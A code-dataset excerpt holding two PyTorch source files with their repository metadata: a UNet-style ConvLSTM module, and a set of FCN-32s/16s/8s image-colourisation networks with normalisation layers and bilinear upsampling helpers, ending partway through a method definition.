        :param batch_first: batch dimension first in sequences (expected True)
        :param bias: use bias terms in the convolutions
        :param return_all_layers: kept for API compatibility (unused here)
        :param gn: flag recorded for logging; cells here are plain ConvLSTMCell
        """
        super(UNetConvLSTM, self).__init__()
        self._check_kernel_size_consistency(kernel_size)
        # Make sure that both `kernel_size` and `hidden_dim` are lists having len == num_layers
        kernel_size = self._extend_for_multilayer(kernel_size, num_layers)
        hidden_dim = self._extend_for_multilayer(hidden_dim, num_layers)
        if not len(kernel_size) == len(hidden_dim) == num_layers:
            raise ValueError('Inconsistent list length.')
        self.height, self.width = input_size  # feature map: (height, width)
        self.gn = gn
        print('Training Phase in UNetConvLSTM: {}, {}, gn: {}'.format(self.height, self.width, self.gn))
        self.input_dim = input_dim            # per-layer input channels
        self.hidden_dim = hidden_dim          # per-layer output channels
        self.kernel_size = kernel_size        # per-layer kernel sizes
        self.num_layers = num_layers          # UNet layer count: must be odd
        self.batch_first = batch_first
        self.bias = bias
        self.return_all_layers = return_all_layers
        cell_list = []
        # Number of down-sampling levels. BUGFIX: integer division (was float
        # `/`) so `i < self.down_num` below compares against an exact int.
        self.down_num = (self.num_layers + 1) // 2
        for i in range(0, self.num_layers):
            # Spatial scale halves at each encoder level and doubles back up
            # through the decoder half of the UNet.
            scale = 2 ** i if i < self.down_num else 2 ** (self.num_layers - i - 1)
            cell_list.append(ConvLSTMCell(input_size=(int(self.height / scale), int(self.width / scale)),
                                          input_dim=self.input_dim[i],
                                          hidden_dim=self.hidden_dim[i],
                                          kernel_size=self.kernel_size[i],
                                          bias=self.bias))
        self.cell_list = nn.ModuleList(cell_list)
        # Learned 2x upsamplers used on the decoder path.
        self.deconv_0 = deConvGnReLU(
            16,
            16,
            kernel_size=3,
            stride=2,
            padding=1,
            bias=self.bias,
            output_padding=1
        )
        self.deconv_1 = deConvGnReLU(
            16,
            16,
            kernel_size=3,
            stride=2,
            padding=1,
            bias=self.bias,
            output_padding=1
        )
        # Final head: 8 channels (last hidden_dim) -> 1-channel cost map.
        self.conv_0 = nn.Conv2d(8, 1, 3, 1, padding=1)

    def forward(self, input_tensor, hidden_state=None, idx=0, process_sq=True):
        """
        Parameters
        ----------
        input_tensor : torch.Tensor
            process_sq=True : 4-D (b, c, h, w) feature map for one time step.
            process_sq=False: 5-D (b, t, c, h, w) full sequence.
        hidden_state : list of (h, c) states or None
            Per-layer ConvLSTM states; re-initialized to zeros when idx == 0.
        idx : int
            Time-step index; 0 triggers fresh states.
        process_sq : bool
            Step-by-step mode (True) vs whole-sequence mode (False).

        Returns
        -------
        (cost, hidden_state) in step mode, or the stacked per-step tanh cost
        volume of shape (b, t, 1, h, w) in whole-sequence mode.
        """
        if idx == 0:  # first call of a sequence: zero-initialize all states
            hidden_state = self._init_hidden(batch_size=input_tensor.size(0))
        layer_output_list = []
        seq_len = input_tensor.size(1)
        cur_layer_input = input_tensor
        if process_sq:
            # Encoder: ConvLSTM cell + 2x2 max-pool, twice.
            h0, c0 = hidden_state[0] = self.cell_list[0](input_tensor=cur_layer_input,
                                                         cur_state=hidden_state[0])
            h0_1 = nn.MaxPool2d((2, 2), stride=2)(h0)
            h1, c1 = hidden_state[1] = self.cell_list[1](input_tensor=h0_1,
                                                         cur_state=hidden_state[1])
            h1_0 = nn.MaxPool2d((2, 2), stride=2)(h1)
            h2, c2 = hidden_state[2] = self.cell_list[2](input_tensor=h1_0,
                                                         cur_state=hidden_state[2])
            # Decoder: learned 2x upsample + skip concat with encoder output.
            h2_0 = self.deconv_0(h2)  # auto reuse
            h2_1 = torch.cat([h2_0, h1], 1)
            h3, c3 = hidden_state[3] = self.cell_list[3](input_tensor=h2_1,
                                                         cur_state=hidden_state[3])
            h3_0 = self.deconv_1(h3)  # auto reuse
            h3_1 = torch.cat([h3_0, h0], 1)
            h4, c4 = hidden_state[4] = self.cell_list[4](input_tensor=h3_1,
                                                         cur_state=hidden_state[4])
            cost = self.conv_0(h4)  # auto reuse
            return cost, hidden_state
        else:
            # Whole-sequence mode: iterate time steps, collect per-step costs.
            for t in range(seq_len):
                h0, c0 = self.cell_list[0](input_tensor=cur_layer_input[:, t, :, :, :],
                                           cur_state=hidden_state[0])
                hidden_state[0] = [h0, c0]
                h0_1 = nn.MaxPool2d((2, 2), stride=2)(h0)
                h1, c1 = self.cell_list[1](input_tensor=h0_1,
                                           cur_state=hidden_state[1])
                hidden_state[1] = [h1, c1]
                h1_0 = nn.MaxPool2d((2, 2), stride=2)(h1)
                h2, c2 = self.cell_list[2](input_tensor=h1_0,
                                           cur_state=hidden_state[2])
                hidden_state[2] = [h2, c2]
                h2_0 = self.deconv_0(h2)  # auto reuse
                # BUGFIX: was torch.concat (newer alias); torch.cat matches
                # the rest of the file and older torch versions.
                h2_1 = torch.cat([h2_0, h1], 1)
                h3, c3 = self.cell_list[3](input_tensor=h2_1,
                                           cur_state=hidden_state[3])
                hidden_state[3] = [h3, c3]
                h3_0 = self.deconv_1(h3)  # auto reuse
                h3_1 = torch.cat([h3_0, h0], 1)
                h4, c4 = self.cell_list[4](input_tensor=h3_1,
                                           cur_state=hidden_state[4])
                hidden_state[4] = [h4, c4]
                cost = self.conv_0(h4)  # auto reuse
                # BUGFIX: was `nn.Tanh(cost)`, which tries to construct a
                # Module with a tensor argument instead of applying tanh.
                cost = torch.tanh(cost)
                layer_output_list.append(cost)
            prob_volume = torch.stack(layer_output_list, dim=1)
            return prob_volume

    def _init_hidden(self, batch_size):
        """Collect a zero-initialized (h, c) state from every ConvLSTM cell."""
        init_states = []
        for i in range(self.num_layers):
            init_states.append(self.cell_list[i].init_hidden(batch_size))
        return init_states

    @staticmethod
    def _check_kernel_size_consistency(kernel_size):
        """Raise ValueError unless kernel_size is a tuple or a list of tuples."""
        if not (isinstance(kernel_size, tuple) or
                (isinstance(kernel_size, list) and all([isinstance(elem, tuple) for elem in kernel_size]))):
            raise ValueError('`kernel_size` must be tuple or list of tuples')

    @staticmethod
    def _extend_for_multilayer(param, num_layers):
        """Broadcast a scalar setting into a per-layer list; pass lists through."""
        if not isinstance(param, list):
            param = [param] * num_layers
        return param
| 42.005391
| 112
| 0.536961
| 2,007
| 15,584
| 3.916791
| 0.091679
| 0.076962
| 0.032057
| 0.041089
| 0.864521
| 0.846966
| 0.832082
| 0.829411
| 0.824704
| 0.810329
| 0
| 0.055162
| 0.356712
| 15,584
| 371
| 113
| 42.005391
| 0.728978
| 0.145662
| 0
| 0.705179
| 0
| 0
| 0.017802
| 0
| 0
| 0
| 0
| 0.016173
| 0.003984
| 1
| 0.047809
| false
| 0
| 0.01992
| 0
| 0.111554
| 0.007968
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f4a7cd92cd27b035dd3d7ae0cf7222304b85cca4
| 26,276
|
py
|
Python
|
src/ResNet/CASIA_WEB_FACE.PyTorch/models.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 300
|
2019-01-28T07:37:53.000Z
|
2022-03-09T02:17:28.000Z
|
src/ResNet/CASIA_WEB_FACE.PyTorch/models.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 15
|
2019-04-22T14:23:01.000Z
|
2021-11-24T09:52:32.000Z
|
src/ResNet/CASIA_WEB_FACE.PyTorch/models.py
|
willyspinner/High-Performance-Face-Recognition
|
c5caad61be97fd20f9c47a727278ff938dc5cc8f
|
[
"MIT"
] | 67
|
2019-01-29T05:42:09.000Z
|
2021-12-28T11:09:44.000Z
|
# import fcn
import os.path as osp
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
class NormFeat(nn.Module):
    """L2-normalize features along the channel dimension, then rescale."""

    def __init__(self, scale_factor=1.0):
        super(NormFeat, self).__init__()
        # Constant multiplier applied after unit-normalization.
        self.scale_factor = scale_factor

    def forward(self, input):
        unit = F.normalize(input, p=2, dim=1)
        return unit * self.scale_factor
class ScaleFeat(nn.Module):
    """Multiply the input by a fixed scalar (a simple 'scale layer')."""
    # https://discuss.pytorch.org/t/is-scale-layer-available-in-pytorch/7954/6?u=arunirc

    def __init__(self, scale_factor=50.0):
        super().__init__()
        self.scale = scale_factor

    def forward(self, input):
        return self.scale * input
# https://github.com/shelhamer/fcn.berkeleyvision.org/blob/master/surgery.py
def get_upsampling_weight(in_channels, out_channels, kernel_size):
    """Make a 2D bilinear kernel suitable for upsampling.

    Returns a float tensor of shape
    (in_channels, out_channels, kernel_size, kernel_size): the diagonal
    channel pairs (i -> i) carry the bilinear filter, all cross-channel
    entries are zero.
    """
    factor = (kernel_size + 1) // 2
    if kernel_size % 2 == 1:
        center = factor - 1
    else:
        center = factor - 0.5
    # Separable triangular ramp; its outer product is the bilinear filter.
    coords = np.arange(kernel_size)
    ramp = 1.0 - np.abs(coords - center) / factor
    filt = np.outer(ramp, ramp)
    weight = np.zeros((in_channels, out_channels, kernel_size, kernel_size),
                      dtype=np.float64)
    weight[range(in_channels), range(out_channels), :, :] = filt
    return torch.from_numpy(weight).float()
class FCN32sColor(nn.Module):
    """FCN-32s colorization network: VGG-16-style encoder + 32x upsampling.

    Predicts per-pixel color-bin scores from a 1-channel input. ``bin_type``
    selects two separate hue/chroma heads ('one-hot') or a single soft-binned
    head ('soft'); ``batch_norm`` toggles BatchNorm after every conv.
    """

    def __init__(self, n_class=32, bin_type='one-hot', batch_norm=True):
        super(FCN32sColor, self).__init__()
        self.n_class = n_class
        self.bin_type = bin_type
        self.batch_norm = batch_norm
        # conv1 (padding=100 is the standard FCN trick so any input size
        # survives the 1/32 downsampling; the output is cropped at the end)
        self.conv1_1 = nn.Conv2d(1, 64, 3, padding=100)
        self.relu1_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv1_1_bn = nn.BatchNorm2d(64)
        self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
        self.relu1_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv1_2_bn = nn.BatchNorm2d(64)
        self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/2
        # conv2
        self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
        self.relu2_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv2_1_bn = nn.BatchNorm2d(128)
        self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
        self.relu2_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv2_2_bn = nn.BatchNorm2d(128)
        self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/4
        # conv3
        self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
        self.relu3_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_1_bn = nn.BatchNorm2d(256)
        self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_2_bn = nn.BatchNorm2d(256)
        self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_3_bn = nn.BatchNorm2d(256)
        self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/8
        # conv4
        self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
        self.relu4_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_1_bn = nn.BatchNorm2d(512)
        self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_2_bn = nn.BatchNorm2d(512)
        self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_3_bn = nn.BatchNorm2d(512)
        self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/16
        # conv5
        self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_1_bn = nn.BatchNorm2d(512)
        self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_2_bn = nn.BatchNorm2d(512)
        self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_3_bn = nn.BatchNorm2d(512)
        self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/32
        # fc6
        self.fc6 = nn.Conv2d(512, 4096, 7)
        self.relu6 = nn.ReLU(inplace=True)
        if batch_norm:
            self.fc6_bn = nn.BatchNorm2d(4096)
        self.drop6 = nn.Dropout2d()
        # fc7 (NOTE: fc7_bn is created unconditionally, matching the original)
        self.fc7 = nn.Conv2d(4096, 4096, 1)
        self.relu7 = nn.ReLU(inplace=True)
        self.fc7_bn = nn.BatchNorm2d(4096)
        self.drop7 = nn.Dropout2d()
        if bin_type == 'one-hot':
            # NOTE: *two* output prediction maps for hue and chroma
            self.score_fr_hue = nn.Conv2d(4096, n_class, 1)
            self.upscore_hue = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
                                                  bias=False)
            self.score_fr_chroma = nn.Conv2d(4096, n_class, 1)
            self.upscore_chroma = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
                                                     bias=False)
            self.upscore_hue.weight.requires_grad = False  # fixed bilinear upsampler
            self.upscore_chroma.weight.requires_grad = False
        elif bin_type == 'soft':
            self.score_fr = nn.Conv2d(4096, n_class, 1)
            self.upscore = nn.ConvTranspose2d(n_class, n_class, 64, stride=32,
                                              bias=False)
            self.upscore.weight.requires_grad = False  # fix bilinear upsampler
        self._initialize_weights()
        # TODO - init from pre-trained network

    def _initialize_weights(self):
        """Set every transpose-conv to a fixed bilinear upsampling kernel."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                pass  # leave the default PyTorch init
            if isinstance(m, nn.ConvTranspose2d):
                assert m.kernel_size[0] == m.kernel_size[1]
                initial_weight = get_upsampling_weight(
                    m.in_channels, m.out_channels, m.kernel_size[0])
                m.weight.data.copy_(initial_weight)

    def _cbr(self, conv, bn_name, relu, h):
        """conv -> (optional) batch-norm -> ReLU.

        The BN layer is looked up by name so it is only touched when
        ``self.batch_norm`` is True (the attribute does not exist otherwise).
        BUGFIX: the original forward applied `conv2_2_bn` even in the
        batch_norm=False branch, raising AttributeError; this helper fixes
        that and removes the 16x duplicated if/else.
        """
        h = conv(h)
        if self.batch_norm:
            h = getattr(self, bn_name)(h)
        return relu(h)

    def forward(self, x):
        """Return color-bin score map(s) cropped to x's spatial size."""
        h = self._cbr(self.conv1_1, 'conv1_1_bn', self.relu1_1, x)
        h = self._cbr(self.conv1_2, 'conv1_2_bn', self.relu1_2, h)
        h = self.pool1(h)
        h = self._cbr(self.conv2_1, 'conv2_1_bn', self.relu2_1, h)
        h = self._cbr(self.conv2_2, 'conv2_2_bn', self.relu2_2, h)
        h = self.pool2(h)
        h = self._cbr(self.conv3_1, 'conv3_1_bn', self.relu3_1, h)
        h = self._cbr(self.conv3_2, 'conv3_2_bn', self.relu3_2, h)
        h = self._cbr(self.conv3_3, 'conv3_3_bn', self.relu3_3, h)
        h = self.pool3(h)
        h = self._cbr(self.conv4_1, 'conv4_1_bn', self.relu4_1, h)
        h = self._cbr(self.conv4_2, 'conv4_2_bn', self.relu4_2, h)
        h = self._cbr(self.conv4_3, 'conv4_3_bn', self.relu4_3, h)
        h = self.pool4(h)
        h = self._cbr(self.conv5_1, 'conv5_1_bn', self.relu5_1, h)
        h = self._cbr(self.conv5_2, 'conv5_2_bn', self.relu5_2, h)
        h = self._cbr(self.conv5_3, 'conv5_3_bn', self.relu5_3, h)
        h = self.pool5(h)
        h = self._cbr(self.fc6, 'fc6_bn', self.relu6, h)
        h = self.drop6(h)
        h = self._cbr(self.fc7, 'fc7_bn', self.relu7, h)
        h = self.drop7(h)
        if self.bin_type == 'one-hot':
            # hue prediction map, cropped by the 19-pixel FCN offset
            h_hue = self.score_fr_hue(h)
            h_hue = self.upscore_hue(h_hue)
            h_hue = h_hue[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
            # chroma prediction map
            h_chroma = self.score_fr_chroma(h)
            h_chroma = self.upscore_chroma(h_chroma)
            h_chroma = h_chroma[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
            h = (h_hue, h_chroma)
        elif self.bin_type == 'soft':
            h = self.score_fr(h)
            h = self.upscore(h)
            h = h[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
        return h
class FCN16sColor(nn.Module):
    """FCN-16s colorization network: VGG-16-style encoder with a pool4 skip.

    Like FCN32sColor but fuses pool4 scores before a 16x upsample. Only
    bin_type='soft' is implemented; 'one-hot' raises NotImplementedError.
    """

    def __init__(self, n_class=32, bin_type='one-hot', batch_norm=True):
        super(FCN16sColor, self).__init__()
        self.n_class = n_class
        self.bin_type = bin_type
        self.batch_norm = batch_norm
        # conv1 (padding=100: standard FCN trick, output cropped at the end)
        self.conv1_1 = nn.Conv2d(1, 64, 3, padding=100)
        self.relu1_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv1_1_bn = nn.BatchNorm2d(64)
        self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
        self.relu1_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv1_2_bn = nn.BatchNorm2d(64)
        self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/2
        # conv2
        self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
        self.relu2_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv2_1_bn = nn.BatchNorm2d(128)
        self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
        self.relu2_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv2_2_bn = nn.BatchNorm2d(128)
        self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/4
        # conv3
        self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
        self.relu3_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_1_bn = nn.BatchNorm2d(256)
        self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_2_bn = nn.BatchNorm2d(256)
        self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_3_bn = nn.BatchNorm2d(256)
        self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/8
        # conv4
        self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
        self.relu4_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_1_bn = nn.BatchNorm2d(512)
        self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_2_bn = nn.BatchNorm2d(512)
        self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_3_bn = nn.BatchNorm2d(512)
        self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/16
        # conv5
        self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_1_bn = nn.BatchNorm2d(512)
        self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_2_bn = nn.BatchNorm2d(512)
        self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_3_bn = nn.BatchNorm2d(512)
        self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/32
        # fc6
        self.fc6 = nn.Conv2d(512, 4096, 7)
        self.relu6 = nn.ReLU(inplace=True)
        if batch_norm:
            self.fc6_bn = nn.BatchNorm2d(4096)
        self.drop6 = nn.Dropout2d()
        # fc7 (NOTE: fc7_bn is created unconditionally, matching the original)
        self.fc7 = nn.Conv2d(4096, 4096, 1)
        self.relu7 = nn.ReLU(inplace=True)
        self.fc7_bn = nn.BatchNorm2d(4096)
        self.drop7 = nn.Dropout2d()
        if bin_type == 'one-hot':
            # NOTE: *two* output prediction maps for hue and chroma
            raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
        elif bin_type == 'soft':
            self.score_fr = nn.Conv2d(4096, n_class, 1)
            self.score_pool4 = nn.Conv2d(512, n_class, 1)
            self.upscore2 = nn.ConvTranspose2d(n_class, n_class, 4, stride=2,
                                               bias=False)
            self.upscore16 = nn.ConvTranspose2d(n_class, n_class, 32, stride=16,
                                                bias=False)
            self.upscore2.weight.requires_grad = False  # fix bilinear upsamplers
            self.upscore16.weight.requires_grad = False
        self._initialize_weights()

    def _initialize_weights(self):
        """Set every transpose-conv to a fixed bilinear upsampling kernel."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                pass  # leave the default PyTorch init
            if isinstance(m, nn.ConvTranspose2d):
                assert m.kernel_size[0] == m.kernel_size[1]
                initial_weight = get_upsampling_weight(
                    m.in_channels, m.out_channels, m.kernel_size[0])
                m.weight.data.copy_(initial_weight)

    def _cbr(self, conv, bn_name, relu, h):
        """conv -> (optional) batch-norm -> ReLU.

        The BN layer is looked up by name so it is only touched when
        ``self.batch_norm`` is True (the attribute does not exist otherwise).
        BUGFIX: the original forward applied `conv2_2_bn` even in the
        batch_norm=False branch, raising AttributeError.
        """
        h = conv(h)
        if self.batch_norm:
            h = getattr(self, bn_name)(h)
        return relu(h)

    def forward(self, x):
        """Return the soft color-bin score map cropped to x's spatial size."""
        h = self._cbr(self.conv1_1, 'conv1_1_bn', self.relu1_1, x)
        h = self._cbr(self.conv1_2, 'conv1_2_bn', self.relu1_2, h)
        h = self.pool1(h)
        h = self._cbr(self.conv2_1, 'conv2_1_bn', self.relu2_1, h)
        h = self._cbr(self.conv2_2, 'conv2_2_bn', self.relu2_2, h)
        h = self.pool2(h)
        h = self._cbr(self.conv3_1, 'conv3_1_bn', self.relu3_1, h)
        h = self._cbr(self.conv3_2, 'conv3_2_bn', self.relu3_2, h)
        h = self._cbr(self.conv3_3, 'conv3_3_bn', self.relu3_3, h)
        h = self.pool3(h)
        h = self._cbr(self.conv4_1, 'conv4_1_bn', self.relu4_1, h)
        h = self._cbr(self.conv4_2, 'conv4_2_bn', self.relu4_2, h)
        h = self._cbr(self.conv4_3, 'conv4_3_bn', self.relu4_3, h)
        h = self.pool4(h)
        pool4 = h  # 1/16, kept for the skip connection
        h = self._cbr(self.conv5_1, 'conv5_1_bn', self.relu5_1, h)
        h = self._cbr(self.conv5_2, 'conv5_2_bn', self.relu5_2, h)
        h = self._cbr(self.conv5_3, 'conv5_3_bn', self.relu5_3, h)
        h = self.pool5(h)
        h = self._cbr(self.fc6, 'fc6_bn', self.relu6, h)
        h = self.drop6(h)
        h = self._cbr(self.fc7, 'fc7_bn', self.relu7, h)
        h = self.drop7(h)
        if self.bin_type == 'one-hot':
            raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
        elif self.bin_type == 'soft':
            h = self.score_fr(h)
            h = self.upscore2(h)
            upscore2 = h  # 1/16
            # Crop pool4 scores to the upsampled map and fuse.
            h = self.score_pool4(pool4)
            h = h[:, :, 5:5 + upscore2.size()[2], 5:5 + upscore2.size()[3]]
            score_pool4c = h  # 1/16
            h = upscore2 + score_pool4c
            h = self.upscore16(h)
            h = h[:, :, 27:27 + x.size()[2], 27:27 + x.size()[3]].contiguous()
        return h

    def copy_params_from_fcn32s(self, fcn32s):
        """Copy weights from a trained FCN32sColor into same-named layers."""
        for name, l1 in fcn32s.named_children():
            try:
                l2 = getattr(self, name)
                l2.weight  # skip ReLU / Dropout
            except Exception:
                continue
            assert l1.weight.size() == l2.weight.size()
            l2.weight.data.copy_(l1.weight.data)
            if l1.bias is not None:
                # BUGFIX/consistency: guard matches FCN8sColor's copier;
                # bias-free layers (bilinear upsamplers) would otherwise
                # crash on l1.bias.size().
                assert l1.bias.size() == l2.bias.size()
                l2.bias.data.copy_(l1.bias.data)
class FCN8sColor(nn.Module):
    """FCN-8s colorization network: VGG-16-style encoder with pool3 and pool4
    skips fused before an 8x upsample. Only bin_type='soft' is implemented.
    """

    def __init__(self, n_class=32, bin_type='one-hot', batch_norm=True):
        super(FCN8sColor, self).__init__()
        self.n_class = n_class
        self.bin_type = bin_type
        self.batch_norm = batch_norm
        # conv1 (padding=100: standard FCN trick, output cropped at the end)
        self.conv1_1 = nn.Conv2d(1, 64, 3, padding=100)
        self.relu1_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv1_1_bn = nn.BatchNorm2d(64)
        self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
        self.relu1_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv1_2_bn = nn.BatchNorm2d(64)
        self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/2
        # conv2
        self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
        self.relu2_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv2_1_bn = nn.BatchNorm2d(128)
        self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
        self.relu2_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv2_2_bn = nn.BatchNorm2d(128)
        self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/4
        # conv3
        self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
        self.relu3_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_1_bn = nn.BatchNorm2d(256)
        self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_2_bn = nn.BatchNorm2d(256)
        self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
        self.relu3_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv3_3_bn = nn.BatchNorm2d(256)
        self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/8
        # conv4
        self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
        self.relu4_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_1_bn = nn.BatchNorm2d(512)
        self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_2_bn = nn.BatchNorm2d(512)
        self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu4_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv4_3_bn = nn.BatchNorm2d(512)
        self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/16
        # conv5
        self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_1 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_1_bn = nn.BatchNorm2d(512)
        self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_2 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_2_bn = nn.BatchNorm2d(512)
        self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
        self.relu5_3 = nn.ReLU(inplace=True)
        if batch_norm:
            self.conv5_3_bn = nn.BatchNorm2d(512)
        self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True)  # 1/32
        # fc6
        self.fc6 = nn.Conv2d(512, 4096, 7)
        self.relu6 = nn.ReLU(inplace=True)
        if batch_norm:
            self.fc6_bn = nn.BatchNorm2d(4096)
        self.drop6 = nn.Dropout2d()
        # fc7 (NOTE: fc7_bn is created unconditionally, matching the original)
        self.fc7 = nn.Conv2d(4096, 4096, 1)
        self.relu7 = nn.ReLU(inplace=True)
        self.fc7_bn = nn.BatchNorm2d(4096)
        self.drop7 = nn.Dropout2d()
        if bin_type == 'one-hot':
            # NOTE: *two* output prediction maps for hue and chroma
            raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
        elif bin_type == 'soft':
            self.score_fr = nn.Conv2d(4096, n_class, 1)
            self.score_pool3 = nn.Conv2d(256, n_class, 1)
            self.score_pool4 = nn.Conv2d(512, n_class, 1)
            self.upscore2 = nn.ConvTranspose2d(n_class, n_class, 4, stride=2,
                                               bias=False)
            self.upscore8 = nn.ConvTranspose2d(n_class, n_class, 16, stride=8,
                                               bias=False)
            self.upscore_pool4 = nn.ConvTranspose2d(n_class, n_class, 4, stride=2,
                                                    bias=False)
            self.upscore2.weight.requires_grad = False  # fix bilinear upsamplers
            self.upscore8.weight.requires_grad = False
            self.upscore_pool4.weight.requires_grad = False
        self._initialize_weights()

    def _initialize_weights(self):
        """Set every transpose-conv to a fixed bilinear upsampling kernel."""
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                pass  # leave the default PyTorch init
            if isinstance(m, nn.ConvTranspose2d):
                assert m.kernel_size[0] == m.kernel_size[1]
                initial_weight = get_upsampling_weight(
                    m.in_channels, m.out_channels, m.kernel_size[0])
                m.weight.data.copy_(initial_weight)

    def _cbr(self, conv, bn_name, relu, h):
